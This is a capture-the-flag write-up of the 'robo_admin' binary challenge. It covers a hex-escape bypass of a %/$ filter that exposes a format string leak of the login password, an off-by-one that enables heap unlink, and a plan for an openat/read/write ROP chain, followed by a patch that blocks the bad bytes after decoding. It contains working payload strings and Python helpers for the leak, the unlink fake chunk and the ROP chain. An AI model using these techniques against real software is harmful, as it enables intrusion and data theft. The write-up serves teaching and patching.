This article analyzes the core logic, root causes, and exploitation chain of the robo_admin challenge. It explains how escape-sequence decoding bypasses the input filter and exposes a format string bug that leaks the password and memory addresses, and how that leak combines with an off-by-one to achieve heap exploitation and an ORW (open/read/write) chain. The article also outlines a practical patching strategy. Keywords: Pwn, Format String, Unlink.
Technical Specification Snapshot
| Parameter | Value |
|---|---|
| Challenge Type | Binary Pwn / Heap Exploitation |
| Primary Language | C |
| Runtime Environment | Linux x86_64 |
| Key Vulnerabilities | Format String, Off-by-One |
| Protections | PIE, Stack Canary, sandbox restrictions on execve/open |
| Exploitation Goals | Leak password, enter admin menu, hijack heap state, achieve ORW |
| Core Dependencies | glibc, tcache/unsorted bin, IDA, GDB |
| Image Source | Screenshots from the original write-up |
The core challenge comes from the mismatch between input filtering and the actual execution path
At first glance, the program blocks % and $, which makes format string exploitation appear impossible. The real issue, however, is that the program validates the raw input first and only then decodes \xNN sequences. That allows an attacker to reconstruct dangerous characters after validation.
In other words, the filter inspects the raw input, but the danger only materializes in the decoded output. Once you understand the setnote -> decode -> show data flow, the full bug chain becomes clear: first bypass the filter, then reach printf(s__1, ...).
AI Visual Insight: This image shows the main menu entry point in the decompiled control flow. It is useful for identifying the function dispatcher, initialization order, and user-reachable attack surface, which is the first step in building an overall exploitability model.
init clears heap state, which sets up the conditions for later heap exploitation
The initialization function iterates through list, frees any existing chunks, and clears the size array, state flags, and note area. This behavior is not a vulnerability by itself, but it affects heap layout and makes later heap operations after login more likely to enter the expected bin chains.
void *init() {
    for (int i = 0; i <= 7; ++i) {
        if (list[i]) {
            free(list[i]); // Free historical heap chunks and reset heap state
            list[i] = 0;
        }
        sizeee[i] = 0; // Clear recorded sizes
    }
    memset(&s_, 0, 0xC0);
    memset(useflag, 0, 8);
    memset(s__1, 0, 0x100);
    noteflag = 0;
    dword_52C4 = 0;
    return 0;
}
This logic rebuilds a heap environment that is clean but still predictable.
The decode function is the real entry point that makes the format string bug exploitable
setnote rejects % and $ in the raw input, but then calls decode. Since decode supports hex escapes such as \x25 and \x24, an attacker can pass the initial check and restore % and $ in the decoded output.
This is a classic semantic mismatch: the program validates the pre-decoded data but executes the post-decoded data.
AI Visual Insight: This image shows the note-setting and input-handling logic. The key detail is the separation between the filter condition and the later decode call, which demonstrates that the defense only covers superficial characters and not the actual decoded payload.
long decode(char *src, char *dst, size_t limit) {
    size_t j = 0;
    for (size_t i = 0; src[i]; ++i) {
        if (src[i] == '\\' && src[i + 1] == 'x') {
            int hi = hex_to_int(src[i + 2]); // Parse the high 4 bits
            int lo = hex_to_int(src[i + 3]); // Parse the low 4 bits
            dst[j++] = (hi << 4) | lo;       // Restore the original byte
            i += 3;
        } else {
            dst[j++] = src[i];               // Write ordinary characters directly
        }
    }
    dst[j] = 0;
    return 0;
}
This code restores hex-escaped input into raw bytes, which directly enables the format string bypass.
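The check-then-decode ordering can be modeled in a few lines of Python. This is a simplified sketch rather than the binary's code: `raw_filter_ok`, `decode_escapes`, and `set_note` are hypothetical names, and the model assumes every `\x` is followed by two valid hex digits.

```python
def raw_filter_ok(raw: bytes) -> bool:
    """Model of the pre-decode check: reject literal '%' and '$'."""
    return b"%" not in raw and b"$" not in raw


def decode_escapes(raw: bytes) -> bytes:
    """Model of decode(): turn each \\xNN escape into the byte 0xNN."""
    out = bytearray()
    i = 0
    while i < len(raw):
        if raw[i:i + 2] == b"\\x" and i + 4 <= len(raw):
            out.append(int(raw[i + 2:i + 4], 16))  # two hex digits -> one byte
            i += 4
        else:
            out.append(raw[i])                     # ordinary byte, copied as-is
            i += 1
    return bytes(out)


def set_note(raw: bytes):
    """Validate the raw bytes first, then decode: the flawed ordering."""
    if not raw_filter_ok(raw):
        return None
    return decode_escapes(raw)


blocked = set_note(b"%6$p")           # literal specifiers are rejected
bypassed = set_note(b"\\x256\\x24p")  # escaped specifiers pass the filter
print(blocked, bypassed)
```

The first call is rejected, while the second passes the check and comes out of the decoder as `%6$p`, which is exactly the gap the exploit relies on.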
The printf call in show treats user input as a format string
When noteflag is set, the show function executes printf(s__1, ...) on the first display. Here, s__1 is the decoded note content, so an attacker can build a format string such as %6$p.%7$p... to leak addresses.
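More importantly, the program passes the random values p_rand and rand as the sixth and seventh variadic arguments. Under the x86_64 System V calling convention, the format string and the first five variadic arguments travel in registers, so these two values are the first ones placed on the stack, where %6$p and %7$p read them. In other words, the program hands the material used to build the login password directly to the attacker's format string.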
printf("Notice: ");
if (noteflag) {
    if (dword_52C4) {
        printf("%s", s__1);
    } else {
        dword_52C4 = 1;
        printf(s__1, n16, v2, v3, v4, v5,
               p_rand, rand, stack0, stack1); // User-controlled format string
    }
}
This code triggers the format string vulnerability during the first display and exposes critical stack arguments.
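To see why the positional indexes 6 and 7 line up with p_rand and rand, the following sketch maps a printf positional index to the place the value is read from under the System V AMD64 calling convention. The helper name `printf_arg_location` is hypothetical, and the model assumes only integer or pointer arguments are involved.

```python
# Integer/pointer argument registers of the System V AMD64 calling convention.
INT_ARG_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]


def printf_arg_location(n: int) -> str:
    """Where printf finds positional argument n (as in %n$p), for n >= 1.

    rdi holds the format string itself, so argument 1 lives in rsi.
    """
    if n < 1:
        raise ValueError("positional arguments start at 1")
    if n < len(INT_ARG_REGS):
        return INT_ARG_REGS[n]
    # Arguments 6 and up are read from the caller's stack, 8 bytes apart,
    # starting at rsp as it was just before the call instruction.
    return f"[rsp+{8 * (n - len(INT_ARG_REGS)):#x}]"


for n in (1, 5, 6, 7, 15):
    print(n, printf_arg_location(n))
```

Arguments 1 through 5 resolve to registers, and argument 6 is the first stack slot, which matches the position of p_rand in the call shown above.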
The login mechanism depends on a random password that can be leaked
login requires the username ROBOADMIN and a 32-character hex password produced by formatting the two random values with %016lx%016lx. Since show can already leak those two values, login is not a real barrier. It is simply the second hop in the exploit chain.
Once the attacker enters the admin menu, the challenge shifts from information disclosure to heap exploitation.
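The password derivation described above can be sketched as follows. `build_password` is a hypothetical helper; it assumes the leak has already been cut out of the program output (after the "Notice: " prefix), that the first two dot-separated fields are p_rand and rand printed with %p, and that the password concatenates them in that order.

```python
def build_password(leak: bytes) -> str:
    """Turn a leak such as b'0x1a2b.0x3c4d.' into the 32-character password."""
    fields = [f for f in leak.strip().split(b".") if f]
    values = []
    for field in fields[:2]:
        # glibc prints a NULL pointer as "(nil)" under %p
        values.append(0 if field == b"(nil)" else int(field, 16))
    if len(values) != 2:
        raise ValueError("expected at least two leaked values")
    # Same layout as C's "%016lx%016lx": 16 lowercase hex digits per value
    return "".join(f"{v:016x}" for v in values)


password = build_password(b"0x1a2b.0x3c4d.0x7ffd.")
print(password)
```

The sample values are made up for illustration; a real run would feed in whatever the first display of the note prints.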
payload = b'\\x256\\x24p.\\x257\\x24p.\\x2515\\x24p.'
# Reconstruct % and $ through \x25 and \x24 to build the format string
This payload passes the initial filter and becomes a working format string (%6$p.%7$p.%15$p.) once decode has run.
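Writing the escapes by hand is error-prone, so a small helper can generate them. The sketch below uses a hypothetical function name, `escape_filtered`, and assumes the decoder consumes exactly two hex digits after `\x`, as the decode listing suggests.

```python
def escape_filtered(fmt: bytes, banned: bytes = b"%$") -> bytes:
    """Rewrite each banned byte as a literal \\xNN escape that decode() restores."""
    out = bytearray()
    for byte in fmt:
        if byte in banned:
            out += b"\\x%02x" % byte  # e.g. '%' (0x25) becomes the 4 bytes \x25
        else:
            out.append(byte)
    return bytes(out)


payload = escape_filtered(b"%6$p.%7$p.%15$p.")
print(payload)
```

Because only two hex digits are consumed per escape, a digit that follows an escape (as in `\x2515`) survives decoding as an ordinary character, which is why the width-free positional form works here.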
The off-by-one in edit is the core primitive that unlocks the heap attack phase
After login, edit contains an obvious boundary bug: the maximum writable length is size + 1. That means an attacker can overflow by one byte into the metadata of the next heap chunk, creating a classic off-by-one.
With tcache already shaped in advance, this single-byte overwrite is enough to influence the adjacent chunk’s size field and then build the conditions for unlink or unsorted bin exploitation.
size_t n = get_length(sizeee[idx] + 1); // Critical bug: allows size+1
ssize_t r = read(0, list[idx], n);
if (sizeee[idx] <= r) {
    list[idx][sizeee[idx] - 1] = 0; // Only fixes the tail byte and cannot stop overflow
}
This logic provides a one-byte out-of-bounds write primitive that can precisely modify a neighboring chunk header.
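Whether the extra byte actually reaches the neighbor's size field depends on the request size. The arithmetic below follows glibc's request-to-chunk rounding on x86_64; the helper names are hypothetical, and the sketch assumes sizeee[idx] stores the size that was passed to malloc.

```python
SIZE_SZ = 8        # sizeof(size_t) on x86_64
MALLOC_ALIGN = 16  # glibc chunk alignment on x86_64
MIN_CHUNK = 0x20   # smallest chunk glibc hands out on x86_64


def chunk_size(request: int) -> int:
    """Chunk size glibc uses for malloc(request), flag bits excluded."""
    size = (request + SIZE_SZ + MALLOC_ALIGN - 1) & ~(MALLOC_ALIGN - 1)
    return max(size, MIN_CHUNK)


def usable_size(request: int) -> int:
    """Bytes usable from the returned pointer, including the next chunk's
    prev_size field, which an in-use chunk is allowed to overlap."""
    return chunk_size(request) - SIZE_SZ


def off_by_one_hits_next_size(request: int) -> bool:
    """True if writing byte index `request` lands on the next chunk's size."""
    return request == usable_size(request)


for req in (0xD0, 0xD8):
    print(hex(req), hex(chunk_size(req)), off_by_one_hits_next_size(req))
```

A 0xd8 request fills its 0xe0 chunk completely, so byte index 0xd8 is the low byte of the next chunk's size field. A 0xd0 request maps to the same chunk size, but its extra byte stays inside the chunk's own slack.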
The attack path can be summarized as leak, login, corrupt heap, write stack, and achieve ORW
In the original write-up, the exploit chain first uses the format string to recover the password, PIE base, and libc base, then enters the backend menu to shape the heap. Because the initialization stage has already freed multiple chunks, the attacker can combine that with a full tcache state so that later frees fall into the unsorted bin.
Next, the off-by-one changes the size of a neighboring chunk. Combined with unlink, this allows the attacker to forge list pointers in .bss, eventually pivot toward environ, leak a stack address, and then write a ROP chain onto the stack to achieve ORW. Because the sandbox disables open, using openat is the more reliable choice.
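The fake chunk used for this kind of unlink usually follows a well-known layout. The sketch below shows the classic unsafe-unlink construction for a 0xd8 request and is not taken from the original exploit: `unlink_payload` is a hypothetical helper, the slot address is a placeholder, and it assumes the neighboring chunk also has size 0xe0.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an unsigned 64-bit little-endian integer."""
    return struct.pack("<Q", value)


def unlink_payload(slot_addr: int, user_size: int = 0xD8) -> bytes:
    """Fake chunk plus one overflow byte for a chunk with user_size usable bytes.

    slot_addr is the address of the list[] entry that points at this chunk.
    """
    fake_size = user_size - 8                # fake chunk ends where the next chunk begins
    body = p64(0) + p64(fake_size | 1)       # fake prev_size, fake size with PREV_INUSE set
    body += p64(slot_addr - 0x18)            # fd: fd->bk (at fd + 0x18) is the slot itself
    body += p64(slot_addr - 0x10)            # bk: bk->fd (at bk + 0x10) is the slot itself
    body = body.ljust(fake_size, b"\x00")
    body += p64(fake_size)                   # next chunk's prev_size must equal the fake size
    next_size = user_size + 8                # 0xe0 when the neighbor is a 0xd8 request
    return body + bytes([next_size & 0xFF])  # low size byte with PREV_INUSE cleared


SLOT = 0x4060  # placeholder for the address of list[idx]; not a real offset
payload = unlink_payload(SLOT)
print(len(payload), payload[-1:])
```

When the neighbor is later freed and consolidates backward, the unlink writes slot_addr - 0x18 into the slot, so the entry ends up pointing just below the list array and further edits can rewrite the array itself.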
A minimal exploitation outline looks like this
from pwn import *
# 1. Build an escaped format string to leak the random password and addresses
fmt = b'\\x256\\x24p.\\x257\\x24p.\\x2515\\x24p.\\x2523\\x24p.'
# 2. Log in to the backend
# 3. Allocate multiple 0xd8 chunks to prepare the heap layout
# 4. Use the off-by-one to modify the neighboring chunk size
# 5. Free to trigger unlink, then redirect a list entry toward environ
# 6. Leak the stack address and then write the openat/read/write ROP chain
This pseudocode summarizes the full attack chain rather than providing fully reproducible exploit details.
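The final stage of the outline can be sketched as a chain builder. Everything address-related here is a placeholder: the gadget dictionary, the path and buffer addresses, and the assumption that the opened file receives descriptor 3 are all illustrative and would have to come from the actual leaks and libc build.

```python
import struct

AT_FDCWD = -100  # Linux constant: resolve relative paths against the current directory


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian value, wrapping negatives to two's complement."""
    return struct.pack("<Q", value & 0xFFFFFFFFFFFFFFFF)


def orw_chain(g: dict, path_addr: int, buf_addr: int, length: int = 0x50) -> bytes:
    """openat(AT_FDCWD, path, O_RDONLY); read(fd, buf, length); write(1, buf, length)."""
    flag_fd = 3  # assumption: first free descriptor after stdin/stdout/stderr
    words = [
        g["pop_rdi"], AT_FDCWD, g["pop_rsi"], path_addr, g["pop_rdx"], 0, g["openat"],
        g["pop_rdi"], flag_fd, g["pop_rsi"], buf_addr, g["pop_rdx"], length, g["read"],
        g["pop_rdi"], 1, g["pop_rsi"], buf_addr, g["pop_rdx"], length, g["write"],
    ]
    return b"".join(p64(w) for w in words)


# Placeholder addresses for illustration only; real values come from the leaks.
gadgets = {"pop_rdi": 0x1111, "pop_rsi": 0x2222, "pop_rdx": 0x3333,
           "openat": 0x4444, "read": 0x5555, "write": 0x6666}
chain = orw_chain(gadgets, path_addr=0x7000, buf_addr=0x7100)
print(len(chain))
```

The chain assumes single-pop gadgets; if the available `pop rdx` gadget also pops another register, an extra filler word is needed after each of its values.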
The correct patch should block dangerous characters after decoding instead of only changing printf
Replacing printf with puts can mitigate the format string issue, but the challenge requires a specific patching behavior. A more complete fix inserts custom validation at the point where decode writes each decoded byte back: as soon as a decoded byte equals % or $, the program prints an error string and does not write that byte.
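The original article uses .eh_frame as the injection area because that section typically does not affect the main logic and has room for a short patch stub. The region must be executable at run time, however, so the patch first changes its permissions. Note that the loader applies permissions per segment, based on the program header flags, so the segment that maps .eh_frame must end up with the execute flag set, not only the section header.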
AI Visual Insight: This image shows the process of locating .eh_frame-related section information in IDA. The focus is on finding a low-interference injection area for patch code and examining section properties and the path for permission changes.
AI Visual Insight: This image shows the exact position and attributes of .eh_frame in the ELF section table view. Before patching, you need to confirm the target section index, size, and flags field to avoid breaking the load layout.
AI Visual Insight: This image shows the result after changing the section flags to executable. The key technical point is turning a data-oriented section into an executable area that can hold a trampoline or custom validation logic.
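; Replace the original 7 bytes (the mov and add shown below) with a jump to check
jmp check   ; jmp rather than call: check leaves via jmp resume, so a call
            ; would strand a return address on the stack on every pass
nop
nop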
check:
    cmp dl, 24h              ; Check whether the byte is '$'
    jz bad_input
    cmp dl, 25h              ; Check whether the byte is '%'
    jz bad_input
    mov [rax], dl            ; Write the decoded byte back normally
    add qword ptr [rbp-8], 3
    jmp resume
bad_input:
    lea rdi, [rip+msg]       ; Print the invalid input warning
    call puts
    jmp resume
This patch enforces validation at the decoded-byte level, which closes the root cause of the bypass.
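The effect of the patch can be modeled at a high level. This is a simplified sketch with a hypothetical function name, `patched_decode`: it drops a banned decoded byte and counts the rejection, whereas the real stub prints a message and its exact resume behavior may differ.

```python
BANNED = b"%$"


def patched_decode(raw: bytes):
    """Decode \\xNN escapes, but refuse to emit '%' or '$'.

    Returns (decoded_bytes, rejected_count).
    """
    out = bytearray()
    rejected = 0
    i = 0
    while i < len(raw):
        if raw[i:i + 2] == b"\\x" and i + 4 <= len(raw):
            byte = int(raw[i + 2:i + 4], 16)
            if byte in BANNED:  # same test as the cmp dl, 24h / cmp dl, 25h pair
                rejected += 1   # the stub prints a warning here instead
            else:
                out.append(byte)
            i += 4
        else:
            out.append(raw[i])
            i += 1
    return bytes(out), rejected


print(patched_decode(b"\\x256\\x24p"))
print(patched_decode(b"\\x41BC"))
```

With the check placed after decoding, the escaped specifiers no longer reach the note buffer, while harmless escapes such as `\x41` still decode normally.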
The most important takeaways from this challenge are two secure design lessons
First, any input validation must stay aligned with the final semantics of the data. If you validate pre-decoded text but execute dangerous APIs on the decoded result, the filter is effectively meaningless.
Second, a one-byte overflow remains highly dangerous in heap challenges. As long as it can influence a chunk size, prev_inuse, or linked-list pointers, an off-by-one is enough to reach high-value exploitation primitives.
AI Visual Insight: This image shows the program’s behavior after patching. It confirms that the program now emits a blocking message when it detects dangerous decoded characters, demonstrating that the fix has moved from superficial function replacement to semantic-level input defense.
FAQ
Q1: Why does a format string vulnerability still exist if % and $ were filtered originally?
Because the filter runs before decoding. An attacker can submit \x25 and \x24, and decode will restore them to % and $. The result then flows into printf(s__1, ...), so the vulnerability still exists.
Q2: Why can the login password be recovered?
When show calls printf, it passes p_rand and rand in positions that the format string can access. The attacker reads them through the format string and then concatenates them using the %016lx%016lx rule to obtain a valid password.
Q3: Why should the patch prioritize checking characters after decoding?
Because that is the root-cause fix. Changing only printf removes the current format string sink, but it does not prove that every future sink is safe. Blocking dangerous characters uniformly at the decoded-output layer directly cuts off the bypass path and provides a stronger defense.
Core Summary: This article reconstructs the robo_admin binary challenge and focuses on two core vulnerabilities: a format string bug and an off-by-one. It explains the full attack chain from decode-based bypass and login credential leakage to heap exploitation and ORW, and then shows how to patch the binary in IDA by injecting validation logic into .eh_frame. Keywords: Pwn, Format String, Unlink.